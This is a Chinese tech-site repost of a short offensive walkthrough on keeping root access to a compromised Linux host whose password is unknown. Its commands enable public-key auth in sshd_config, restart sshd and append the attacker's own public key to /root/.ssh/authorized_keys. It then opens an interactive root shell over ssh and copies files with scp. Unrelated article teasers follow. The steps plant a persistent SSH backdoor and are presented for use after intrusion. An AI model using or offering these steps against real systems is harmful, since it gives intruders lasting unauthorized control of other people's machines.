搜索歷史

清空
搜索熱詞
      0
      • 聊天消息
      • 系統(tǒng)消息
      • 評論與回復
      VIP于 到期 續(xù)費
      登錄后你可以
      • 下載海量資料
      • 學習在線課程
      • 觀看技術(shù)視頻
      • 寫文章/發(fā)帖/加入社區(qū)
      會員中心
      創(chuàng)作中心
      發(fā)布
      創(chuàng)作活動

      完善資料讓更多小伙伴認識你,還能領(lǐng)取20積分哦,立即完善>

      3天內(nèi)不再提示

      實戰(zhàn)|無密碼Linux主機利用公鑰直接連接

      jf_Fo0qk3ln ? 來源:zeo.cool ? 2023-01-13 09:06 ? 次閱讀

      0x00 前提

      以前的老東西,拿出水一篇

      一般是通過 Rce,提權(quán)等等情況,拿到目標 linux 的 root 權(quán)限

      主要是沒有密碼, hash 跑不出來,機器無法正常出網(wǎng)

      就可以去試著正向鏈接

      0x01 首先目標主機,修改目標 Ssh 服務配置

      啟用ssh證書登錄,并重啟SSH 服務

      echo RSAAuthentication yes >> /etc/ssh/sshd_config
echo PubkeyAuthentication yes >> /etc/ssh/sshd_config
systemctl restart sshd

      0x02 本地linux上生成密鑰

      # ssh-keygen -t rsa -P "" -f ~/.ssh/id_rsa

      注意:這一步最好去一個純凈的Linux生成,因為這個key會暴露你的主機名

      38fcad70-92da-11ed-bfe3-dac502259ad0.png

      //找見id_rsa.pub自行拷貝出來
ls -al /root/.ssh/
cp /root/.ssh/id_rsa.pub /home/xxxx/Desktop/
//賦于權(quán)限
chmod 777 /home/xxxx/Desktop/id_rsa.pub
      /root/.ssh/文件夾里面有倆文件: 
      id_rsa(私鑰)
id_rsa.pub(公鑰)

      0x03 linux目標機寫入公鑰

      自行上傳公鑰到內(nèi)網(wǎng)linux,并將其保存到/root/.ssh/目錄下,文件名改為authorized_keys,或者命令執(zhí)行用echo追加

      如目標已事先存在authorized_keys文件,直接往最后追加即可

      注意:再操作之前要對原authorized_keys進行“備份”,以備不時之需。

      # echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8Zrks74SYQ4JzKFvYPyL2tG+Scx/y/gIDk5znJF6XKjJ2MFS7RfsjKqpRk7bb+bDpgb5awiMzMOUgwBDheJKerji9/FD+jHEI133ejCZphiPL0+OItLdl7uUt+NFMMPNeXh9lmDOwApxVg54xhDjyzWYaV6xQgvWuZK+6qNBD1TW2/zXImeHpC+L37KQSgFvtxyOiYw/Uq/Caoa9VkcFsUsJ1ftmKSh7unkEJiJAHpzmI0SquNdrgTJ5AiVclQbTa8viyl+irXYjUyvxWKCqBhMhuQQFEMRdViVStgSRoVREEH361J7T7oCC0rJE2XV8MlejXZGi7if34gYHYgyBKvEQ9/Ff+fkQV5LXdZLkC0h3wOBLV9lWwMamlFSjJMTSBlZP1syHYV/X1YNO76SmLUUi48PwDQa52g0tI2TusDmjgARWxwhCndu463dwbCcGjfHnSEAWEB2WGJcKOcpfGLUrdDt9My/d26dfMTNdlaw+kdnDVlYvk0qnyBBZhyfE= Zeo@ZeoMacBook-Pro.local >> /root/.ssh/authorized_keys

      0x04 幽靈登錄

      ssh -T root@192.168.1.1 /usr/bin/bash -i

      3936172c-92da-11ed-bfe3-dac502259ad0.png

      0x05 利用Scp 無密碼互傳文件

      scp -P 22 -r /root/fsacn root@10.211.55.11:/usr/tmp/fsacn
      審核編輯:湯梓紅
      聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學習之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
      • Linux
        +關(guān)注

        關(guān)注

        87

        文章

        11331

        瀏覽量

        209998
      • 主機
        +關(guān)注

        關(guān)注

        0

        文章

        1002

        瀏覽量

        35197
      • 公鑰
        +關(guān)注

        關(guān)注

        0

        文章

        22

        瀏覽量

        12049
      • SSH
        SSH
        +關(guān)注

        關(guān)注

        0

        文章

        189

        瀏覽量

        16367
      • root
        +關(guān)注

        關(guān)注

        1

        文章

        86

        瀏覽量

        21403

      原文標題:實戰(zhàn)|無密碼Linux主機利用公鑰直接連接

      文章出處:【微信號:菜鳥學信安,微信公眾號:菜鳥學信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

      收藏 人收藏

        評論

        相關(guān)推薦

        藍牙連接主機可否直接連接保存的地址,不用每次掃描再連接?

        藍牙連接主機可否直接連接保存的地址,不用每次掃描再連接?藍牙第一次主從機連了以后,我記下了從機的地址,利用flash保存下來了下次
        發(fā)表于 04-06 15:11

        git、私鑰使用經(jīng)驗

        今天在windows用了git,整理下遇到的問題。首先生成密鑰(包含和私鑰),然后就等待通過管理員被服務器接收,接下來就可以clone了,但是最開始的時候,可以通過驗證,但是不
        發(fā)表于 12-10 22:40

        什么是RSA指數(shù)

        什么是RSA指數(shù)RSA指數(shù)的選取
        發(fā)表于 01-01 06:09

        mbedTLS設置已知的問題求解

        我正在將代碼從 esp8266 遷移到 esp32-c3。在舊代碼中,bearssl 通過提供已知的可信來使用,該在工廠時保存在閃存中 // 假設給定的
        發(fā)表于 04-14 07:52

        【觸覺智能 Purple Pi OH 開發(fā)板體驗】網(wǎng)絡狀態(tài)連接ssh解決辦法

        ] --------- 網(wǎng)絡狀態(tài)連接ssh解決辦法 有多種連接SSH的方式,以下是其中一些常見的方式: 終端命令行連接: 在終端命令行中,使用ssh命令加上目標
        發(fā)表于 08-20 12:38

        基于Chebyshev多項式的密碼系統(tǒng)算法

        介紹有限域Chebyshev多項式的定義和性質(zhì)。針對基于有限域Chebyshev多項式的類ElGamal密碼系統(tǒng)存在的弱點,提出一個新的
        發(fā)表于 04-08 08:36 ?13次下載

        基于橢圓曲線的EIGamal加密體制的組合分析及應用

        分析了基于橢圓曲線的EIGamal 密碼的組合技術(shù)?;诜N子和密鑰映射的新技術(shù)可以實現(xiàn)從有限的種子變量產(chǎn)生幾乎“無限”密鑰對,有望解
        發(fā)表于 08-28 08:20 ?8次下載

        用JAVA語言實現(xiàn)RSA密碼算法

        用JAVA語言實現(xiàn)RSA密碼算法:本文闡述了公開密鑰密碼體制RSA算法的原理及實現(xiàn)技術(shù)。并在此基礎(chǔ)上,給出了JAVA語言實現(xiàn)的RSA算法源代碼。關(guān)鍵詞:ILSA體制;
        發(fā)表于 02-10 10:27 ?58次下載

        密碼分析簡介

        對公密碼體制的密碼分析歷史的形成,給出一些重要結(jié)果的描述和重要文獻的歷史發(fā)展線索,同時對2010年-2014年有限域和橢圓曲線的離散對數(shù)問題的突破性進展給予了簡單介紹.自
        發(fā)表于 01-16 11:38 ?1次下載

        如何使用生成的加密數(shù)據(jù)和私鑰解密數(shù)據(jù)

        是最早、應用最廣泛的密碼系統(tǒng)之一。它以其創(chuàng)始人Ron Rivest、AdiShamir和Leonard Adleman的名字命名,幾乎成為
        發(fā)表于 12-06 10:23 ?7809次閱讀

        EE-385:用加速器實現(xiàn)RSA密碼系統(tǒng)

        EE-385:用加速器實現(xiàn)RSA密碼系統(tǒng)
        發(fā)表于 04-29 17:29 ?7次下載
        EE-385:用<b class='flag-5'>公</b><b class='flag-5'>鑰</b>加速器實現(xiàn)RSA<b class='flag-5'>密碼</b>系統(tǒng)

        C -與ORACLE直接連接代碼

        C -與ORACLE直接連接代碼(肇慶理士電源技術(shù)有限)-C#-與ORACLE直接連接代碼,有需要的可以參考!
        發(fā)表于 08-31 11:18 ?2次下載
        C -與ORACLE<b class='flag-5'>直接連接</b>代碼

        本源量子算力賦能密碼應用

        發(fā)展趨勢進行廣泛交流,深入探討商用密碼、區(qū)塊鏈、隱私計算、后量子密碼等技術(shù)的演進趨勢。本源量子作為國內(nèi)率先在金融領(lǐng)域探索量子計算應用的團隊受邀參加,并就量子計算在
        發(fā)表于 11-26 16:28 ?930次閱讀

        本源量子算力賦能密碼應用

        發(fā)展趨勢進行廣泛交流,深入探討商用密碼、區(qū)塊鏈、隱私計算、后量子密碼等技術(shù)的演進趨勢。本源量子作為國內(nèi)率先在金融領(lǐng)域探索量子計算應用的團隊受邀參加,并就量子計算在
        的頭像 發(fā)表于 11-30 11:19 ?723次閱讀
        本源量子算力賦能<b class='flag-5'>公</b><b class='flag-5'>鑰</b><b class='flag-5'>密碼</b>應用

        n頭壓接連接器怎樣分辨好壞

        德索工程師說道N頭壓接連接器作為電子設備中的重要組件,其質(zhì)量的好壞直接關(guān)系到整個系統(tǒng)的性能和穩(wěn)定性。因此,正確分辨N頭壓接連接器的好壞至
        的頭像 發(fā)表于 11-26 11:52 ?177次閱讀
        n<b class='flag-5'>公</b>頭壓<b class='flag-5'>接連接</b>器怎樣分辨好壞